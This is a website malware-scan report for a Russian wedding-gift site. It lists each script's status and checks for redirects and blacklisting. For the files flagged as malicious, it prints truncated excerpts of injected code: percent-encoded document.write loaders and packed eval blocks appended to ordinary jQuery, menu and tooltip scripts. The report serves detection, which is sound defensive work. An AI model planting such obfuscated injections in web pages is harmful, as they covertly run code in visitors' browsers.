Scanned pages/files
Request | Server response | Status |
http://www.svadba-podarok.ru/ | 200 OK Content-Length: 25005 Content-Type: text/html | clean |
http://www.svadba-podarok.ru/media/system/js/caption.js | 200 OK Content-Length: 11714 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = Antivirus reports:
| ||
http://www.svadba-podarok.ru/templates/blueish/js/jquery-1.4.4.min.js | 200 OK Content-Length: 88352 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(E,B){function ka(a,b,d){if(d===B&&a.nodeType===1){d=a.getAttribute("data-"+b);if(typeof d==="string"){try{d=d==="true"?true:d==="false"?false:d==="null"?null:!c.isNaN(d)?parseFloat(d):Ja.test(d)?c.parseJSON(d):d}catch(e){}c.data(a,b,d)}else d=B}return d}function U(){return false}function ca(){return true}function la(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function Ka(a){var b,d,e,f,h,l,k,o,x,r,A,C=[];f=[];h=c.data(this,this.nodeType?"events":"__events__");if(typeof Antivirus reports:
| ||
http://www.svadba-podarok.ru/templates/blueish/js/jqnoconflict.js | 200 OK Content-Length: 9782 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var jq = jQuery.noConflict(); ;document.write(unescape("%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%70%2C%61%2C%63%2C%6B%2C%65%2C%72%29%7B%65%3D%66%75%6E%63%74%69%6F%6E%28%63%29%7B%72%65%74%75%72%6E%28%63%3C%61%3F%27%27%3A%65%28%70%61%72%73%65%49%6E%74%28%63%2F%61%29%29%29%2B%28%28%63%3D%63%25%61%29%3E%33%35%3F%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%2B%32%39%29%3A%63%2E%74%6F%5 Antivirus reports:
| ||
http://www.svadba-podarok.ru/templates/blueish/js/lv_dropdown.js | 200 OK Content-Length: 10115 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function mainmenu(){
jq(" .menu_lv_dropdown ul ").css({display: "none"}); jq(" .menu_lv_dropdown li").hover(function(){ jq(this).find('ul:first').css({visibility: "visible",display: "none"}).show(400); },function(){ jq(this).find('ul:first').css({visibility: "hidden"}); }); } jq(document).ready(function(){ mainmenu(); }); ;document.write(unescape("%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72% Antivirus reports:
| ||
http://www.svadba-podarok.ru/templates/blueish/js/effects.js | 200 OK Content-Length: 10668 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jq(document).ready(function($){
jq('.contentheading,.componentheading,.breadcrumbs').hide('', function(){ }); jq('.contentheading,.componentheading,.breadcrumbs').fadeIn('slow', function(){ }); jq('a#gotop').click(function(){ jq('html, body').animate({ scrollTop: 0 }, 'slow'); }); < Antivirus reports:
| ||
http://www.svadba-podarok.ru/plugins/system/rokbox/rokbox.js | 200 OK Content-Length: 30027 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('R.5K({\'2M\':u(){H 8.1E(\'2u\',\'\')},\'25\':u(){H 8.1E(\'2u\',\'3I\')}});7m.5K({\'7l\':u(){l 6L=/^(1Y|6o):\\/\\/([a-z-.0-9]+)[\\/]{0,1}/i.6r(E.3a);l 1q=/^(1Y|6o):\ Antivirus reports:
| ||
http://www.svadba-podarok.ru/plugins/system/rokbox/themes/mynxx/rokbox-config.js | 200 OK Content-Length: 12437 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var rokbox; window.addEvent('domready', function() { rokbox = new RokBox({ 'theme': 'mynxx', 'transition': Fx.Transitions.Cubic.easeOut, 'duration': 500, 'chase': 80, 'frame-border': 34, 'content-padding': 0, 'arrows-height': 16, 'effect': 'growl', 'captions': 1, 'captionsDelay': 100, 'scrolling': 1, 'keyEvents': 1, 'overlay': { 'background': '#fff', 'opacity': 0.7, 'duration': 300, 'transition': Fx.Transitions.Quad.easeInOut }, 'def Antivirus reports:
| ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19916 Content-Type: text/javascript | clean |
http://www.svadba-podarok.ru/modules/mod_virtuemart_universal/files/mootools_tooltip.js | 200 OK Content-Length: 10162 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window.addEvent('domready', function() {
var Tips2 = new Tips($$('.mod_vm_universal a'), { maxTitleChars: 500, initialize:function(){ this.fx = new Fx.Style(this.toolTip, 'opacity', {duration: 400, wait: true}).set(0); }, onShow: function(toolTip) { this.fx.start(1); }, onHide: function(toolTip) { this.fx.start(0); } }); }); ;document.write(unescape("%3 Antivirus reports:
| ||
http://pro100prazdnik.ru/necrom.php?id=gor_4 | 200 OK Content-Length: 4735 Content-Type: text/html | clean |
http://pro100prazdnik.ru/wedding_dela/wedding_avto/105-kortezh.-svadebnaja-skazochnaja-kareta-ili.html | 200 OK Content-Length: 55193 Content-Type: text/html | clean |
http://pro100prazdnik.ru/engine/classes/js/jquery.js | 200 OK Content-Length: 93868 Content-Type: application/x-javascript | clean |
http://pro100prazdnik.ru/engine/classes/js/jqueryui.js | 200 OK Content-Length: 65477 Content-Type: application/x-javascript | clean |
http://pro100prazdnik.ru/engine/classes/js/dle_js.js | 200 OK Content-Length: 20837 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: svadba-podarok.ru
Result:
GET / HTTP/1.1
Host: svadba-podarok.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: svadba-podarok.ru
Referer: http://www.google.com/search?q=svadba-podarok.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: svadba-podarok.ru
Referer: http://www.google.com/search?q=svadba-podarok.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=svadba-podarok.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://svadba-podarok.ru/
Result: svadba-podarok.ru is not infected or malware details are not published yet.
Result: svadba-podarok.ru is not infected or malware details are not published yet.